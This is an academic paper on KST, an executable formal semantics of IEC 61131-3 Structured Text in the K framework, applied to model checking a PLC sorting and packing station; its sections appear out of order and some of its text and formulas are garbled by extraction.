Semantic rule (8) states that if the top computation is the identifier of an instance of a program-type POU, KST loads its environment and then executes its statements. Execution of an instance of a function-type POU or a function block-type POU is invoked explicitly by the invocation statement. The semantic rule for the invocation statement of an instance of a function block-type POU is shown in (9).

⟨Name(Params) ↷ Rest ⇒ initInputs(Params) ↷ Stmts ↷ assignOutputs(Params)⟩_k   ⟨I ⇒ J⟩_pid   ⟨E ⇒ E′⟩_env
⟨ ⟨Name ↦ J …⟩_iIns ⟨I⟩_iId ⟩_ins   ⟨ ⟨E′⟩_iEnv ⟨T⟩_iType ⟨J⟩_iId ⟩_ins   ⟨ ⟨T⟩_pName ⟨Stmts⟩_pStmts ⟩_pou
⟨·List ⇒ ListItem(sf(Rest, I, E))⟩_stack        (9)

The aforementioned semantic rule shows that the current instance I, its local environment, and the rest of the computations in k are saved to the runtime stack so that the calling routine can subsequently resume. Computations have a list structure, capturing the intuition of computation sequentialization, with list constructor _↷_ (read "followed by") and unit "." (the empty computation). The currently executed instance then changes to J, whose local environment is loaded into the env cell. J's input variables are initialized if they are specified in the parameter assignment list (i.e., Params). KST then executes the statements of J and assigns the values of J's output variables to variables of the calling routine if this is specified in Params. If the top computation is the invocation statement of a function, the operations to perform vary slightly from (9). An additional auxiliary notation lookup(Name, J) is appended to assignOutputs, because the invocation of a function should be an operand of an expression.
The invocation of a function yields a value in the form "V :: T".

V. EVALUATION AND APPLICATION ON VERIFICATION
In addition to formalizing the semantics of ST, and thus providing a precise language reference model of ST, our secondary objective is to verify ST programs by using the built-in tools provided by K. Before demonstrating how these tools can be used to verify ST programs, we first present the evaluation of KST with respect to its conformance with the IEC 61131-3 standard.

A. TESTING KST CONFORMANCE WITH THE STANDARD
K provides various built-in tools that allow us to derive an interpreter from the semantics. To this end, we tested our semantics with a test suite, following motives similar to those of [2], [20], and [23]. However, ST has no known available test suite. The IEC 61131-3 standard provides various examples to demonstrate the semantics of ST language constructs. These examples were used in our evaluation as test cases for KST. Generally, the direct use of these examples is regarded as nontrivial. Most of them are code snippets, and some consist of only a single statement. Moreover, some of them have minor issues, such as the use of unspecified structures, which are fixed by putting the code snippets into the corresponding POU constructs or slightly modifying the original code. Finally, 13 function-type POUs, 38 function block-type POUs and 19 program-type POUs are obtained.1 The evaluation result is shown in Table 2.

TABLE 2. Evaluation result.

KST passes 53 of the 70 tests from the IEC 61131-3 standard. The failing tests contain the usage of unspecified standard functions or standard function blocks, such as TON, SR, ADD, and so on. After supplying the implementation of these POUs, KST passes the remaining 17 tests.

KST contains more than 550 semantic rules. Following previous studies [20], [22], we measured the semantic coverage of the tests, that is, the percentage of the semantic rules exercised by all test cases. The tests from the IEC 61131-3 standard cover under 50% of the semantic rules; many features of ST are missed. Therefore, we hand-crafted 14 additional program-type POUs as tests during our evaluation. All 84 tests, including the tests from IEC 61131-3, cover all semantic rules in KST.

All experiments were run on a machine with a 64-bit Windows 10 Professional operating system, an Intel(R) Core(TM) i5-4590 CPU at 3.30 GHz and 16 GB of DDR3 1333 MHz RAM. Each test takes 4.6 s on average to complete, excluding the startup time of K (about 8 s).

B. LINEAR TEMPORAL LOGIC MODEL CHECKING
This section presents a case study to show an application of KST in verifying ST programs. We demonstrate model checking of linear temporal logic (LTL) properties. The industrial control system used as the case study is the sorting and packing station (SPS) from a pinion product line. SPS provides a function for sorting and packing pinions of different materials, schematically represented in Figure 7.

1 https://github.com/samson-bu/kst/tree/master/tests

FIGURE 7. Scheme of the sorting and packing station.
The automation of SPS is operated by a Modicon M340 PLC from Schneider Electric.2 As shown in Figure 7, SPS has three subsystems: the transporting system, which consists of several conveyors (e.g., C_1, C_2 and C_3) and corresponding motors with a single direction of movement (C_1_D, C_2_R and C_3_R); the sorting system, which consists of several robotic arms (e.g., RA_1 and RA_2) and various sensors; and the packing system, which consists of metal trays and a sealing machine (not shown in Figure 7).

2 https://www.schneider-electric.cn/zh/

The workpieces of different materials are transported by a linear conveyor (C_1) driven by a unidirectional motor (C_1_M) moving in one direction (C_1_D). They first reach a scanning position that has a sensor (S_P_S) to detect the presence of the pinion and two other sensors (S_M1 and S_M2) to detect what kind of material is used. The detected information is forwarded to the control program; thus, the pinion is transported to the right conveyor (e.g., C_2 or C_3). The intended behavior for the robotic arm RA_1 is simple: when the sensor S_P_S detects a pinion, RA_1 must move left to the position "left" and then transport the pinion to the conveyor C_2. RA_1 is represented by an instance of the function block-type POU RA_CL, which has 5 input variables, 6 output variables and 4 internal variables. Two properties summarized from the real specification of SPS are listed below.

P1: To ensure that a pinion can be picked up by a robotic arm normally, the conveyor C_1 must stop when the pinion reaches the scanning position (i.e., S_P_S is true). The property P1 is expressed as the LTL formula □(C_1_D U S_P_S), where □ indicates "always" and U indicates "until".

P2: When a pinion is identified as type 1 (i.e., S_P_S1 & S_M1 = TYPE1), RA_1 goes left, goes down and then picks up the pinion. The property P2 is expressed as the LTL formula □((BOC ∧ S_P_S1 ∧ S_M1) → ◇(EOC ∧ RA_1.M_L ∧ ◇(EOC ∧ RA_1.M_D))), where ◇ indicates "eventually". In the formula, BOC and EOC are Boolean symbols, which evaluate to true only at the beginning and the end of each scan cycle, respectively.

In addition to RA_CL, the control program has a function block-type POU called EmergencyStop, which has five input variables, four output variables and a single internal variable. EmergencyStop is a safety-related function block for monitoring an emergency stop button; thus, its output EStopOut must be set to true or false for the emergency switch-off functionality in a safety-critical system. EmergencyStop is implemented in ST with more than 100 lines of code. A careless programmer may still hide a defect in the implementation.

By using the built-in tools provided by K, the aforementioned properties can be verified using the following command:

    krun SPS.st --ltlmc LTL-Formula

The option "--ltlmc" indicates that the specified program (e.g., SPS.st) is model-checked against the LTL formula that follows it. The K framework returns the verification results after executing this command. The basic idea of the formal verification is to explore the state space of the application by executing it on the derived interpreter while checking whether the specified property is violated. If a violation exists, a counterexample of the property is found; otherwise, the property is verified to be true.

The verification of property P2 yields a counterexample, indicating that the property is not satisfied.
Carefully inspecting the implementation of SPS, we notice that the program controls RA_1 to move down but forgets to test whether RA_1 has reached the position "left". This bug is fixed and then P2 is verified. The verification of P1 takes about 7 s, P2 about 15 s and P3 about 4.5 s to complete.

VI. RELATED WORK
Formal semantics research for real programming languages has been a focus of both industry and academia. Owing to space restrictions, this section only presents large-scale semantics defined in K and other studies closely related to the verification of PLC programs.

A. OTHER SEMANTICS IN K
The K framework has been successfully used to define semantics for several programming languages, such as C, Java, and JavaScript, among others. We present only a brief overview of this work because of space limitations. Reference [1] describes an executable formal semantics of C, which has been thoroughly tested using the GCC torture test suite, 99.2% of which is passed. A further study [23] defines the "negative" semantics of C11, such that the semantics can reject undefined programs. Reference [2] presents a complete executable formal semantics of Java 1.4, called K-Java. It also develops a test suite alongside the development of K-Java, following test-driven development, and K-Java has been extensively tested using the developed test suite. Reference [20] provides a formal semantics of JavaScript, which has passed all 2782 tests in the ECMAScript 5.1 conformance test suite. Some studies targeting new languages, such as the Ethereum Virtual Machine (KEVM [24]) and P4 (P4K [22]), have recently been published. These languages remain in the early stages of language design and are relatively unstable; many problems in their specifications have been revealed through the development of their semantics in K. ST is a PLC domain-specific programming language; thus, specialities of the PLC domain, such as the cyclic scanning execution mechanism, are considered in the ST formalization. Therefore, the interpreter derived from our semantics can execute ST programs in the PLC manner.

B. VERIFICATION OF PLC PROGRAMS
Several studies have been conducted to verify PLC programs by using formal methods such as model checking. Reference [25] presents a survey that summarizes model checking practices in the verification of PLC systems. PLC programs written in the IEC 61131-3 programming languages or their dialects are abstracted to automata, Petri nets, or other state-based transition systems. Verification is then generally conducted using existing model checking tools, such as SPIN [26], SMV [27], UPPAAL [28], [29], and so on, or by self-developed model checkers like PLCverif [30], Arcade.PLC [31], and so on. However, the limitation of these studies is the lack of formal semantics of the PLC programs themselves. To address this problem, several studies concerning the formal semantics of PLC programming languages have been proposed. For example, [6], [8], [10], [12] present the formal semantics of IL, a simple assembly-like language within the IEC 61131-3 standard. References [10], [32], and [33] provide the formal semantics of sequential function charts, a special-purpose language for constructing complex PLC applications. Reference [18] defines a small-step operational semantics for SCL, which is offered by Siemens and is a dialect of ST within IEC 61131-3.
However, to the best of our knowledge, no other studies have focused on the formal semantics of ST. In the current study, we define the formal semantics of ST in the K framework.

VII. CONCLUSION AND FUTURE WORK
This paper presents an executable formal semantics of the ST language. The semantics (called KST) is formalized from the specification in IEC 61131-3, which is a widely accepted international standard for PLCs. KST covers most key features of ST defined in the second edition of IEC 61131-3, such as common programming concepts, program organization units and, particularly, the cyclic scanning execution mechanism. We systematically test KST by using examples from IEC 61131-3 and several hand-crafted examples. We formally verify an industrial manufacturing application by using KST and the built-in tools provided by K, which demonstrates the usefulness of our formal semantics. Our semantics is a formalization of the specification of ST in the second edition of IEC 61131-3, because many industrial programs are developed in this version. Moreover, IEC 61131-3 is still evolving, and new features continue to emerge. For example, the third edition (proposed in 2012) incorporates object-oriented principles into PLC programming. Fortunately, KST is modular and thus can easily be extended without modifying the previously defined semantics. Therefore, we intend to extend KST with semantics for the new features introduced by the new version in the near future. We believe that the extension will be straightforward because the third edition of IEC 61131-3 is fully upward compatible with the second edition. The object-oriented features of Java are discussed in [2], providing a reference for future related studies.

REFERENCES
[1] C. Ellison and G. Rosu, "An executable formal semantics of C with applications," ACM SIGPLAN Notices, vol. 47, no. 1, pp. 533–544, Jan. 2012.
[2] D. Bogdanas and G. Roşu, "K-Java: A complete semantics of Java," in ACM SIGPLAN Notices, vol. 50, no. 1, pp. 445–456, 2015.
[3] C. Baier and J.-P. Katoen, Principles of Model Checking. Cambridge, MA, USA: MIT Press, 2008.
[4] D. Darvas, B. F. Adiego, A. Vörös, T. Bartha, E. B. Viñuela, and V. M. G. Suárez, "Formal verification of complex properties on PLC programs," in Proc. Int. Conf. Formal Techn. Distrib. Objects, Compon., Syst. Berlin, Germany: Springer, 2014, pp. 284–299.
[5] D. Darvas, E. B. Viñuela, and I. Majzik, "What is special about PLC software model checking?" in Proc. 16th Int. Conf. Accel. Large Exp. Phys. Control Syst., Barcelona, Spain, Oct. 2017, p. THPHA159.
[6] A. Mader and H. Wupper, "Timed automaton models for simple programmable logic controllers," in Proc. IEEE 11th Euromicro Conf. Real-Time Syst., Jun. 1999, pp. 106–113.
[7] R. Huuck, "Software verification for programmable logic controllers," Ph.D. dissertation, Inst. Comput. Sci. Appl. Math., Univ. Kiel, Kiel, Germany, 2003.
[8] R. Huuck, "Semantics and analysis of instruction list programs," Electron. Notes Theor. Comput. Sci., vol. 115, pp. 3–18, Jan. 2005.
[9] S. O. Biha, "A formal semantics of PLC programs in Coq," in Proc. IEEE 35th Annu. Comput. Softw. Appl. Conf. (COMPSAC), Jul. 2011, pp. 118–127.
[10] J. O. Blech and S. O. Biha, "Verification of PLC properties based on formal semantics in Coq," in Proc. Int. Conf. Softw. Eng. Formal Methods. Berlin, Germany: Springer, 2011, pp. 58–73.
[11] R. Wang, Y. Guan, L. Liming, X. Li, and J. Zhang, "Component-based formal modeling of PLC systems," J. Appl. Math., vol. 2013, Feb.
2013, Art. no. 721624.
[12] J. O. Blech and S. O. Biha. (2013). "On formal reasoning on the semantics of PLC using Coq." [Online]. Available: https://arxiv.org/abs/1301.3047
[13] N. Bauer, R. Huuck, B. Lukoschus, and S. Engell, "A unifying semantics for sequential function charts," in Integration of Software Specification Techniques for Applications in Engineering. Berlin, Germany: Springer, 2004, pp. 400–418.
[14] J. O. Blech. (2011). "A tool for the certification of PLCs based on a Coq semantics for sequential function charts." [Online]. Available: https://arxiv.org/abs/1102.3529
[15] O. Rossi and P. Schnoebelen, "Formal modeling of timed function blocks for the automatic verification of ladder diagram programs," in Proc. 4th Int. Conf. Autom. Mixed Processes, Hybrid Dyn. Syst. (ADPM), Dortmund, Germany, 2000, pp. 177–182.
[16] H. B. Mokadem, B. Bérard, V. Gourcuff, O. De Smet, and J.-M. Roussel, "Verification of a timed multitask system with UPPAAL," IEEE Trans. Autom. Sci. Eng., vol. 7, no. 4, pp. 921–932, Oct. 2010.
[17] H. Barbosa and D. Déharbe, "Formal verification of PLC programs using the B method," in Proc. Int. Conf. Abstract State Mach., Alloy, B, VDM, Z. Berlin, Germany: Springer, 2012, pp. 353–356.
[18] D. Darvas, I. Majzik, and E. B. Viñuela, "PLC program translation for verification purposes," Periodica Polytechn. Elect. Eng. Comput. Sci., vol. 61, no. 2, pp. 151–165, 2017.
[19] International Standards, Part 3: Programming Languages, document IEC 61131, 2003. [Online]. Available: http://www.plcopen.org/pages/tc1_standards/iec_61131_3/
[20] D. Park, A. Ştefănescu, and G. Roşu, "KJS: A complete formal semantics of JavaScript," ACM SIGPLAN Notices, vol. 50, no. 6, pp. 346–356, 2015.
[21] A. Ştefănescu, D. Park, S. Yuwen, Y. Li, and G. Roşu, "Semantics-based program verifiers for all languages," ACM SIGPLAN Notices, vol. 51, no. 10, pp. 74–91, 2016.
[22] A. Kheradmand and G. Roşu. (2018). "P4K: A formal semantics of P4 and applications." [Online]. Available: https://arxiv.org/abs/1804.01468
[23] C. Hathhorn, C. Ellison, and G. Roşu, "Defining the undefinedness of C," ACM SIGPLAN Notices, vol. 50, no. 6, pp. 336–345, 2015.
[24] E. Hildenbrandt et al., "KEVM: A complete formal semantics of the Ethereum virtual machine," in Proc. IEEE 31st Comput. Secur. Found. Symp. (CSF), Oxford, U.K., Jul. 2018.
[25] T. Ovatman, A. Aral, D. Polat, and A. O. Ünver, "An overview of model checking practices on verification of PLC software," Softw. Syst. Model., vol. 15, no. 4, pp. 937–960, 2016.
[26] T. Mertke and G. Frey, "Formal verification of PLC programs generated from signal interpreted Petri nets," in Proc. IEEE Int. Conf. Syst., Man, Cybern., vol. 4, Oct. 2001, pp. 2700–2705.
[27] G. Canet, S. Couffin, J.-J. Lesage, A. Petit, and P. Schnoebelen, "Towards the automatic verification of PLC programs written in instruction list," in Proc. IEEE Int. Conf. Syst., Man, Cybern., vol. 4, Oct. 2000, pp. 2449–2454.
[28] H. Dierks, "PLC-automata: A new class of implementable real-time automata," in Proc. Int. AMAST Workshop Aspects Real-Time Syst. Concurrent Distrib. Softw. Berlin, Germany: Springer, 1997, pp. 111–125.
[29] H. Willems, "Compact timed automata for PLC programs," Koninklijke Philips Electron. N.V., Nat. Lab. Unclassified Rep. 830/99, 1999.
[30] D. Darvas, E. B. Viñuela, and B. F.
Adiego, "PLCverif: A tool to verify PLC programs based on model checking techniques," in Proc. 15th Int. Conf. Accel. Large Exp. Phys. Control Syst., Melbourne, VIC, Australia, Oct. 2015, p. WEPGF092.
[31] S. Biallas, J. Brauer, and S. Kowalewski, "Arcade.PLC: A verification platform for programmable logic controllers," in Proc. 27th IEEE/ACM Int. Conf. Autom. Softw. Eng., Sep. 2012, pp. 338–341.
[32] S. Bornot, R. Huuck, Y. Lakhnech, and B. Lukoschus, "An abstract model for sequential function charts," in Discrete Event Systems. Boston, MA, USA: Springer, 2000, pp. 255–264.
[33] S. Bornot, R. Huuck, B. Lukoschus, and Y. Lakhnech, "Verification of sequential function charts using SMV," in Proc. Int. Conf. Parallel Distrib. Process. Techn. Appl. (PDPTA), Las Vegas, NV, USA, 2000.

YANHONG HUANG was born in Neijiang, Sichuan, China, in 1986. She received the B.S. degree in software engineering and the Ph.D. degree in computer science from East China Normal University, Shanghai, China, in 2009 and 2014, respectively, where she has been with the School of Computer Science and Software Engineering, as an Assistant Researcher, since 2014. In 2012, she was a Research Student with Teesside University, U.K. Her research interests include formal methods, semantics theory, and the analysis and verification of embedded systems and industrial software. Her awards and honors include the national scholarship, in 2013, the IBM China excellent students, in 2013, and Shanghai excellent graduates, in 2009 and 2014.

XIANGXING BU was born in Heze, Shandong, China, in 1992. He received the B.S. degree from Shandong Agricultural University, Tai'an, Shandong, China, in 2015. He is currently pursuing the M.S. degree in software engineering with East China Normal University, Shanghai, China. His research interests include the verification of industrial control programs and model checking.

GANG ZHU received the B.S. degree from the University of Shanghai for Science and Technology, Shanghai, China, in 2017. He is currently pursuing the M.S. degree in software engineering with East China Normal University, Shanghai. Since 2017, he has been a Research Assistant with the National Trusted Embedded Software Engineering Center, Shanghai. His research interests include the operational semantics of programming languages and software component models with applications in the industrial field.

XIN YE received the B.S. degree in software engineering from East China Normal University, Shanghai, China, in 2013. She was enrolled in the Master-Doctoral program of East China Normal University in 2013. She is currently pursuing a Joint Ph.D. degree between East China Normal University and Paris Diderot University, Paris, France. Her research interests include program analysis and verification, such as using model checking to verify binary code, behavior analysis using logics, and malware detection. Ms. Ye's awards and honors include the Chinese Government Scholarship.

XIAORAN ZHU received the B.S. degree in software engineering from East China Normal University, Shanghai, China, in 2010, where she is currently pursuing the Graduate degree with the School of Computer Science and Software Engineering. Her research interests include programming languages and formal methods.

JIANQI SHI was born in Tianjin, China, in 1984. He received the B.S. degree in software engineering and the Ph.D.
degree in computer science from East China Normal University, Shanghai, China, in 2007 and 2012, respectively, where he is currently with the School of Computer Science and Software Engineering, as an Associate Researcher. From 2012 to 2014, he was a Research Fellow with the National University of Singapore. Moreover, in 2014, he was a Research Scientist with the Temasek Laboratory, under the Ministry of Defense of Singapore. His research interests include formal methods, formal modeling, and the verification of real-time and control systems, and the IEC 61508 and IEC 61131 standards. His awards and honors include the Shanghai Science and Technology Committee Rising-Star Program, in 2018, and the ACM and CCF nomination of excellent doctor in Shanghai, in 2014.
Received December 19, 2018, accepted January 10, 2019, date of publication January 21, 2019, date of current version February 8, 2019.
Digital Object Identifier 10.1109/ACCESS.2019.2894026

KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification
YANHONG HUANG1, XIANGXING BU2, GANG ZHU2, XIN YE2, XIAORAN ZHU2, AND JIANQI SHI3
1 Shanghai Key Laboratory of Trustworthy Computing, East China Normal University, Shanghai 20062, China
2 National Trusted Embedded Software Engineering Technology Research Center, East China Normal University, Shanghai 20062, China
3 Hardware/Software Co-Design Technology and Application Engineering Research Center, East China Normal University, Shanghai 20062, China
Corresponding author: Jianqi Shi ([email protected])
This work was supported in part by the Shanghai Science and Technology Committee Rising-Star Program under Grant 18QB1402000, and in part by the National Natural Science Foundation of China under Grant 61602178.

INDEX TERMS Formal verification, K framework, operational semantics, programmable logic controller.

I. INTRODUCTION
PLCs are special-purpose computers designed for industrial automation control. They have been widely adopted as central controllers for many safety-critical systems, such as nuclear power stations. Traditionally, in ensuring the quality of a PLC's control program, intensive testing is performed to reveal as many defects as possible. However, testing has several disadvantages, such as the inability to ensure the absence of defects or to provide information about the defects that have yet to be uncovered. Thus, testing is less than ideal for safety-critical applications. Consequently, wide-scale research has been intensified, aimed at improving the reliability of PLC programs.

An active topic is the formal verification of PLC programs. One of the most widely known formal verification techniques is model checking [3]. Model checking allows us to prove the correctness or incorrectness of the intended PLC programs with respect to a certain formal specification or property. Accordingly, model checking is highly recommended when developing safety-critical applications [4]. Model checking shows potential; however, this method has not been "easy-to-use or part of the state of the practice of PLC program development" [5]. In our argument, the difficulties of using model checking in the PLC domain are twofold. First, the effort to perform model checking is nontrivial, because both a formal model of the intended PLC program and formal properties need to be created. Second, PLC programs can be developed using various programming languages, which generally have no precisely defined semantics [5]. The first difficulty is traditionally addressed by cooperation between control engineers and formal methods experts. However, this traditional practice has several issues; for instance, potential misunderstandings of program behaviors may lead to an incorrect formal model. Thus, automated model checkers that directly generate a formal model from PLC programs are needed. Developing such tools requires precisely defined semantics of the implemented language. The second difficulty renders the development process challenging. Thus, a large body
of research has focused on providing formal semantics for a specific PLC programming language [6]–[18]. However, only [17] provides formal semantics for a subset of Structured Text (ST), which is a widely used programming language provided by the IEC 61131-3 standard. In addition, [18] presents formal semantics for Structured Control Language (SCL), which is a variant of ST offered by Siemens.

In the current study, we present formal operational semantics for the ST language. ST is a textual, high-level language [19] and has exclusive advantages in handling complex algorithms compared with the other languages provided by the IEC 61131-3 standard. Thus, it is often the preferred language for developing large-scale PLC programs. Moreover, ST is supported by most leading PLC vendors, such as Siemens, Beckhoff and Omron. The semantics presented in this study is based on the official ST language specification provided by the second edition of the IEC 61131-3 standard [19]. The semantics is formalized in K, a rewriting-based semantic framework. K has been successfully applied to many programming languages, such as Java [2], C [1], JavaScript [20], and so on. To the best of our knowledge, our formalization of the semantics of ST (called KST) covers most features of ST and the distinct characteristics of PLCs, such as the cyclic scanning execution mechanism. Further, KST has the following advantages:

executable. K provides several built-in tools that allow us to derive an interpreter for ST programs, rendering KST executable.
human-readable. KST encompasses the definition of syntax and semantics, which is compact and easily understood and accepted by everyone.
modular. New language features can be added without the need to change the previous formalization of the language.

The remainder of this paper is organized as follows. Section II provides a brief overview of PLCs and the programming concepts defined in IEC 61131-3. Section III presents an overview of our formalization effort. Section IV describes the formal semantics of ST. Section V presents an evaluation of KST and an application of KST to the verification of ST programs. Section VI reviews related studies regarding big semantics in K and the verification of PLC programs. Section VII concludes this paper and offers directions for future work.

II. PRELIMINARIES
A. PROGRAMMABLE LOGIC CONTROLLER
PLCs are special-purpose computers, which have been widely used in industrial automation. The PLC's ability to process a large number of I/O points is one of the key reasons for PLC usage in the automation industry. For example, medium and large PLCs can control a large number (>256) of discrete elements using very fast scan times. Figure 1 shows the key components of a typical PLC and their relationships. PLCs are normally connected to input/output peripherals through the input modules and output modules. The input module receives signals from input devices, such as switches or digital sensors. The output module sends commands from the processor to actuators such as motors, relays, and so on.

FIGURE 1. Components of a typical PLC.
FIGURE 2. The cyclic scanning execution mechanism of PLC.

The most prominent feature of a PLC is the "cyclic scanning" execution mechanism, which differs from that of a general-purpose computer.
As shown in Figure 2, control programs are executed cyclically by the processor. First, the PLC samples physical signals from all input devices (e.g., sensors, switches) connected to the input module. Second, the PLC executes control programs to determine the output states. Third, the PLC updates the output states to actuators (e.g., robot, valves) connected to the output module. The three aforementioned steps comprise a scan cycle . B. IEC 61131-3 STRUCTURED TEXT LANGUAGE The IEC 61131-3 standard is a generally acknowledged inter- national standard, within which programming languages and basic software architecture for developing PLC programs are de ned. ST is a textual, high-level programming lan- guages de ned in IEC 61131-3. Similar to most modern high-level programming languages, ST provides the ability to develop applications with complex algorithms. Conse- quently, it is often the preferred language for developing large-scale applications. Program organization units (POUs) are the smallest soft- ware units from which PLC programs are built. They are at the bottom layer of the basic software model for PLC programs. The IEC 61131-3 standard de nes these three different POU types, in ascending order of functionality: Function . This type of POU has no static variables (without memory); that is, multiple invocations with the same input parameters always yield the same result. A function-type POU can be called by other POUs. Function block . This type of POU has static variables (with memory) and can have multiple instances each of which has a unique identi er. Multiple invocations with the same input paraments for a function block instance may yield different results. A function block-type POU 14594 VOLUME 7, 2019 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification can be called only by function block-type or program- type POUs. Program . This type of POU represents the ``main pro- cedure'' and can access physical addresses, for instance, PLC inputs and outputs. A program-type POU can be called only by the PLC system. A PLC program written in ST consists of several POUs at least one of which is of the program type. In ST, every POU is a construct consisting of the declaration of variables and the body of statements list. Figure 3 shows an example of an ST program, it containing three POUs: a program-type POU prog, a function-type POU Addand a function block- type POU Counter . In line 10, prog declares an instance of Counter as an internal variable c. In line 15, prog invokes the function Addwith two INT variables: In1 and In2. FIGURE 3. An example of ST program. III. OVERVIEW OF OUR FORMALIZATION EFFORT This section presents the work ow of our formalization effort for the semantics of ST whose language speci cation for syntax and semantics is provided by the second edition of IEC 61131-3 [19]. This section also shows the role of for- malized semantics in the veri cation of PLC programs. Stef nescu et al. [21] argued that analysis tools for any real programming language should be developed based on formal semantics other than the informal speci cation of the language. On one hand, informal semantic speci cation may lead to different interpretations. On the other hand, veri - cation based on informal speci cation may prove incorrect properties or disprove correct properties because of the mis- interpretation of the semantics of the target programming languages [22]. The formalization of the semantics of ST is prompted by similar motivations. 
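To make the scan cycle described in Section II-A concrete, the following Python sketch emulates the three steps of one scan (sample the inputs, execute the control program, commit the outputs). The I/O helpers and the pump/level-sensor logic are hypothetical placeholders invented for this illustration; they are not taken from IEC 61131-3, from Figure 3, or from KST.

```python
# Minimal sketch of the PLC cyclic scanning mechanism:
# sample inputs -> execute control program -> update outputs.
# The devices and the control logic are hypothetical placeholders.

def read_inputs():
    # In a real PLC this samples the input module (sensors, switches).
    return {"start_button": True, "level_sensor": False}

def control_program(inputs, state):
    # Stand-in for the user program (e.g., a program-type POU): keep the
    # pump on while the start button is pressed and the tank is not full.
    state["pump_on"] = inputs["start_button"] and not inputs["level_sensor"]
    return {"pump": state["pump_on"]}, state

def write_outputs(outputs):
    # In a real PLC this drives the output module (relays, motors, valves).
    print(outputs)

state = {"pump_on": False}
for _ in range(3):                                  # a real controller loops forever
    inputs = read_inputs()                          # step 1: sample inputs
    outputs, state = control_program(inputs, state) # step 2: execute program
    write_outputs(outputs)                          # step 3: commit outputs
```

In an actual controller the loop never terminates, and the program step would be the installed program-type POU rather than a hand-written Python function.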
Our effort to establish formal semantics and its application in the veri cation of ST programs are presented in Figure 4. A. OVERVIEW This study targets the formal semantics of the ST language. Our formalization efforts are based on the language speci- cation provided by the second edition of the IEC 61131-3 standard [19]. The language speci cation is given in natural language and thus contains ambiguities, such as the use of FIGURE 4. Our formalization effort for the formal semantics of ST. the V AR_GLOBAL construct in program-type POUs. This ambiguity leads to different misinterpretations of the seman- tics of ST, impeding the development of automatic analysis tools for ST programs. As depicted in Figure 4, we formalized the semantics (called KST) from IEC 61131-3. KST is de ned in K, a rewriting-based semantic framework. KST consists of two parts: the syntax de ned in Backus-Naur Form and the semantics that is formalized into a collection of seman- tic rules. Moreover, KST covers other features de ned by IEC 61131-3, such as the particular programming con- cept for PLCs, and includes other features of PLC them- selves, such as the cyclic scanning execution mechanism (cf. Section II-A). Kprovides various built-in tools that allow the derivation of an interpreter for ST, rendering KST executable. To build con dence in executable semantics, of cial conformance test suits are ideal targets. However, no such test suit for ST thus far exists. IEC 61131-3 provides many examples to explain the semantics of constructs in ST. We then adopt these exam- ples as test cases to validate our KST formalization for ST. KST is also evaluated using hand-crafted programs to ensure high semantic coverage of KST. Figure 4 illustrates the role of formal semantics in the veri cation of ST programs. KST can be used beyond being a mere formal reference for ST. Moreover, a model checker is derived from KST with slightly increased effort by using built-in tools provided by K. We discuss the application of semantics in verifying their implementations (details are presented in Section V). IV. FORMALIZATION OF ST IN K A.Kframework Kis a rewriting-based programming language semantic framework. In K, the de nition of a programming language consists of two parts: the syntax and the semantics. The syntax is given in the form of conventional Backus-Naur Form . The semantics is de ned with rewrite rules (also called semantic rules) over con gurations. A con guration is a set of labeled, potentially nested units (called cells). It indicates the state of the running program and its execution context VOLUME 7, 2019 14595 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification FIGURE 5. The configuration of KST. such as memory, environment, and so on. A rewrite rule describes the one-step transition from one con guration to another. Formally, a rewrite rule is of the form C!C0, where CandC0are con gurations. If a rewrite rule matches the current con guration, this rule res and rewrites the cur- rent con guration as speci ed to its right-hand side (e.g., C0). Multiple rewrite rules can re at the same time. For improved understanding of rewrite rules, the following example is presented: X VVVT khX7!Li envhL7!Vi store hL7!Ti type:(1) There are four cells involved in (1), with the cell name as subscript. The ``'' in a cell is called the cell frame which denotes the content irrelevant to the rule. 
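Before the individual cells of rule (1) are explained, the following Python sketch gives an informal picture of how such a rewrite fires: dictionaries stand in for the env, store, and type cells, a list stands in for the k cell, and a variable at the top of k is rewritten to its value/type pair. This is only an analogy for the rewriting idea, not the K framework's actual machinery, and the variable name, storage location, and value are made up for the example.

```python
# Illustrative only: dictionaries stand in for the env, store and type cells,
# and a list stands in for the k cell (leftmost element = top computation).
# The lookup rule rewrites a variable X at the top of k into its value/type
# pair "V :: T", read off from the store and type cells.

config = {
    "k":     ["X"],             # computations still to be executed
    "env":   {"X": "L1"},       # variable -> storage location
    "store": {"L1": 7},         # location -> value
    "type":  {"L1": "INT"},     # location -> declared data type
}

def lookup_rule(cfg):
    top = cfg["k"][0]
    if top in cfg["env"]:                   # rule matches: top computation is a variable
        loc = cfg["env"][top]
        cfg["k"][0] = (cfg["store"][loc], cfg["type"][loc])   # rewrite X to "V :: T"
        return True
    return False                            # rule does not fire

lookup_rule(config)
print(config["k"])    # [(7, 'INT')] -- the lookup result replaces X
```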
The horizontal line in a cell (e.g., in k) denotes a state transition, that is, if (1) res, parts of con guration above the line (i.e., X) will be rewritten as the content below the line (i.e., VVVT). Sematic rule (1) is taken from KST and describes how to lookup the value of a variable X. The kcell contains a list of computations to be executed, with the leftmost computation (also called the topcomputation) executed rst. The envcell represents the local environment and is constructed as a map from the variables to their storage locations. The store cell represents the storage and the type cell stores information concerning data types of storage locations. In K, cells that are not affected can be omitted. In (1), if the top computation is a variable lookup expression, then it will be replaced by ``V :: T'' that is an auxiliary representation of a value and its corresponding data type in KST. B. CONFIGURATION Figure 5 shows the con guration de ned in KST. Cells in the con guration store information concerning program con- structs and its execution context. For example, the pous cell contains a set of poucells, with each representing a POU. The symbol ``*'' appearing next to the poucell name denotes that multiple cells with the same name are allowed in the pous cell. Each poucell stores information about a POU, such as the name of POU (in pName ), declaration of variables (in pVars ), and statement list (in pStmts ). If the POU is of the function type, the data type of its return value is stored in the pRet cell; otherwise pRet remains empty (denoted by ``.K''). Some cells are used to record execution context. For example, the pidcell holds the identi er of the currently executed POU instance. Thestack cell represents the runtime stack, which contains a list of stack frame (denoted by ``sf()'' in KST).Theincell and outcell contain the input signal and output signal from/to devices connected to the PLC. After parsing, ST programs are processed in three phases (discussed in the following), and the current execution phase is stored into the phase cell. C. SYNTAX AND SEMANTICS Table 1 presents partial syntax of ST de ned in KST. The syntax is given in the form of Extended Backus- Naur Form (EBNF) according to the grammar de ned in IEC 61131-3 [19]. In Table 1, the option is represented through square brackets ``[ S ]'', which means zero or one occurrence of S. The closure is represented by curly braces ``{S}'', which means zero or more concatenations of S. For example, in syntax for variable declarations, ``[:= Constant]'' means that ``:= Constant'' may be present just once, or not at all, ``Id{, 